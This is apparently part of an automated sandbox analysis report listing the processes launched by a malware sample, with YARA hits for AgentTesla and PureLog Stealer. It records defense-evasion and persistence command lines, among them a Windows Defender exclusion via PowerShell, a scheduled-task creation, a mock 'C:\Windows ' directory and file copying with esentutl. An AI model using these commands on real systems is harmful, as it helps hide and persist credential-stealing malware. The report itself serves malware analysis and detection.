                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:20
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:21
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                                                                                                                                                                                                                    File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:21
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:21
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:21
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:22
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:23
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x90000
                                                                                                                                                                                                                                                                                                                                                    File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:23
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:23
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\xpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x390000
                                                                                                                                                                                                                                                                                                                                                    File size:18'944 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:24
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                    File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E471E4037B76A28D3D82E42538FC3807
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x3a0000
                                                                                                                                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:25
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:28
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                                                                                    File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:28
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                                                                                    File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:28
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                                                                                    File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:28
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                    File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:907DB1B5C7DE81B95CC62375B2502582
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:32
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6616b0000
                                                                                                                                                                                                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:35
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                    File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:BB9DE1AD24CC587EB4D9FB9CF61AE13B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:36
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:38
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:39
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:40
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:40
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                                                                                                                                                                                    File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
